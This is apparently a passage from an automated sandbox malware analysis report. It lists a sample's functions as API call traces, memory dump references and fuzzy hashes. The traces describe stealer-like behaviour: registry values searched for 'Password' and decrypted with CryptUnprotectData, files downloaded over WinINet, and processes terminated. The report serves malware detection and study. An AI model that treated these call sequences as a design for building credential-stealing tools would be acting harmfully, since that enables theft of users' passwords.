                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8E126
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 769e6a26741377c9b7b8648283b46ef790245b68c85581cee3ae1bc5b8c1f30a
                                • Instruction ID: f725f8d31074e002bcd4932827f26a95c39db76c20901b386e75b9dc49c1bfeb
                                • Opcode Fuzzy Hash: 769e6a26741377c9b7b8648283b46ef790245b68c85581cee3ae1bc5b8c1f30a
                                • Instruction Fuzzy Hash: BA617F7191011CEFCB55EB64CC88ADD77B4FF8C310F1089A5A619A3251DB70AF85AF90
                                Function 00C76AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76AFF
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C76B2C
                                • StrCmpCA.SHLWAPI(?,0179F498), ref: 00C76B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00C76B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C76B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00C76BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C76BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00C76BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00C76C10
                                • InternetCloseHandle.WININET(00000000), ref: 00C76C17
                                • InternetCloseHandle.WININET(?), ref: 00C76C21
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: c355c6faa248e1734934d4bbef5aebeabad0f6742b62385679084357bca9fe77
                                • Instruction ID: 398944897c4ea75fa37b0c9841f149569400fc3f38e4802d6c30017dbcbcbc57
                                • Opcode Fuzzy Hash: c355c6faa248e1734934d4bbef5aebeabad0f6742b62385679084357bca9fe77
                                • Instruction Fuzzy Hash: 53418475B00609AFDB20DF65DC85FAE77B8EB49701F108554FA09E7280DF70AE449BA4
                                Function 00C7BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7BC1F
                                • lstrlen.KERNEL32(00000000), ref: 00C7BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7BCAC
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C7BD23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 7d1beaa2c3fc2afda7219e35b130230fa32c49604649599b8837eae648796db0
                                • Instruction ID: f50c416549b1d044413ebfb7defc9a8a57ce79bcac9f4c104111f7dc3bd2cf73
                                • Opcode Fuzzy Hash: 7d1beaa2c3fc2afda7219e35b130230fa32c49604649599b8837eae648796db0
                                • Instruction Fuzzy Hash: A4A18B30A012058FCB25DF29D949BAEB7F4EF59304F19C069E81EAB262DB31ED45DB50
                                Function 00C95EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00C96014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 00C9609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C960D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 32514dcf1d5bbc38306e7cbb3dcceafa0ede90fb450c0dbb690dfbe85cd87e2f
                                • Instruction ID: de63456eab265c53fe92115da2c8c7f10b743e5c3722d288fb737a5292370014
                                • Opcode Fuzzy Hash: 32514dcf1d5bbc38306e7cbb3dcceafa0ede90fb450c0dbb690dfbe85cd87e2f
                                • Instruction Fuzzy Hash: E2619E70B00604DBDF18CF9CC8D996EB7B6EF84714B244A59E5928B781D731EE81CB98
                                Function 00C8E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E07D
                                • lstrcat.KERNEL32(?,?), ref: 00C8E098
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0AC
                                • lstrcat.KERNEL32(?,0178A5C8), ref: 00C8E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0D4
                                • lstrcat.KERNEL32(?,0179DE70), ref: 00C8E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8E126
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 607c7df0bdbb6dadc436b5389b16f0dcb38db2648733ec010df5a325607a4da1
                                • Instruction ID: 97f141fb64b6157da2d4bcd123f63005d47b3faf910fc304831325a89eac7bd8
                                • Opcode Fuzzy Hash: 607c7df0bdbb6dadc436b5389b16f0dcb38db2648733ec010df5a325607a4da1
                                • Instruction Fuzzy Hash: 1F41B47191011C9FCB65EB64DC88ADD73B4FF48310F0489A4F51AA3252DB30AF859F90
                                Function 00C77A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C777D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C77805
                                  • Part of subcall function 00C777D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00C7784A
                                  • Part of subcall function 00C777D0: StrStrA.SHLWAPI(?,Password), ref: 00C778B8
                                  • Part of subcall function 00C777D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C778EC
                                  • Part of subcall function 00C777D0: HeapFree.KERNEL32(00000000), ref: 00C778F3
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C77A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00C77ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00C77ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C77AF0
                                • wsprintfA.USER32 ref: 00C77B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C77B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C77B47
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C77B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: b2855538a2e0139fb3d8875f221aef9382992f3add9b5919238d910cf4c59b93
                                • Instruction ID: 5a7e202a6b01bf6e740698e9a2b828c59a03104640f29a2c6c0ee09913b2816c
                                • Opcode Fuzzy Hash: b2855538a2e0139fb3d8875f221aef9382992f3add9b5919238d910cf4c59b93
                                • Instruction Fuzzy Hash: 7F31D876A00218EFCB10DB65DD849AFB779FB89314B158669E509A3200DB70FD05DB90
                                Function 00C881B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C8820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88243
                                • lstrlen.KERNEL32(00000000), ref: 00C88260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88297
                                • lstrlen.KERNEL32(00000000), ref: 00C882B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C882EB
                                • lstrlen.KERNEL32(00000000), ref: 00C88308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88337
                                • lstrlen.KERNEL32(00000000), ref: 00C88351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88380
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 463b8e83eca32122362346b290aac898537c4129e959146ff6f795db6cd6cb6d
                                • Instruction ID: 0734c0689d4556743af8fc47c01c890a2055b6ed70bd171a4d3dd15fe3e92f29
                                • Opcode Fuzzy Hash: 463b8e83eca32122362346b290aac898537c4129e959146ff6f795db6cd6cb6d
                                • Instruction Fuzzy Hash: 2751CB70A002029FDB10EF29D958A6BB7A8EF45700F458524ED16EB655EF30FE54CBE0
                                Function 00C777D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C77805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00C7784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00C778B8
                                  • Part of subcall function 00C77750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C7775E
                                  • Part of subcall function 00C77750: RtlAllocateHeap.NTDLL(00000000), ref: 00C77765
                                  • Part of subcall function 00C77750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C7778D
                                  • Part of subcall function 00C77750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00C777AD
                                  • Part of subcall function 00C77750: LocalFree.KERNEL32(?), ref: 00C777B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C778EC
                                • HeapFree.KERNEL32(00000000), ref: 00C778F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00C77A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 8af9731f7da2e8fc1f91b58b5225b3a7804f8f0acae9cf14c44a011f9c9f462f
                                • Instruction ID: 6250a0bf4ea211455a306915dbd8a22a567ab8940c951c0748d904628302b36e
                                • Opcode Fuzzy Hash: 8af9731f7da2e8fc1f91b58b5225b3a7804f8f0acae9cf14c44a011f9c9f462f
                                • Instruction Fuzzy Hash: 3C7130B5D0021DAFDB10DF95DC849DEB7B8EF49300F108569E619A7200EB316E89CF90
                                Function 00C94500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00C84F39), ref: 00C94545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9454C
                                • wsprintfW.USER32 ref: 00C9455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00C945CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00C945D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 00C945E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: %hs
                                • API String ID: 885711575-2783943728
                                • Opcode ID: a97072621eaa64871e5987fcdc0cc44aec91f1edfe8579c2b7ac2eb8fcaddb4f
                                • Instruction ID: a613021e01b72c69a265c5727737eeae3b019ef9a8de8b9f5f20a4ae1efeb5c2
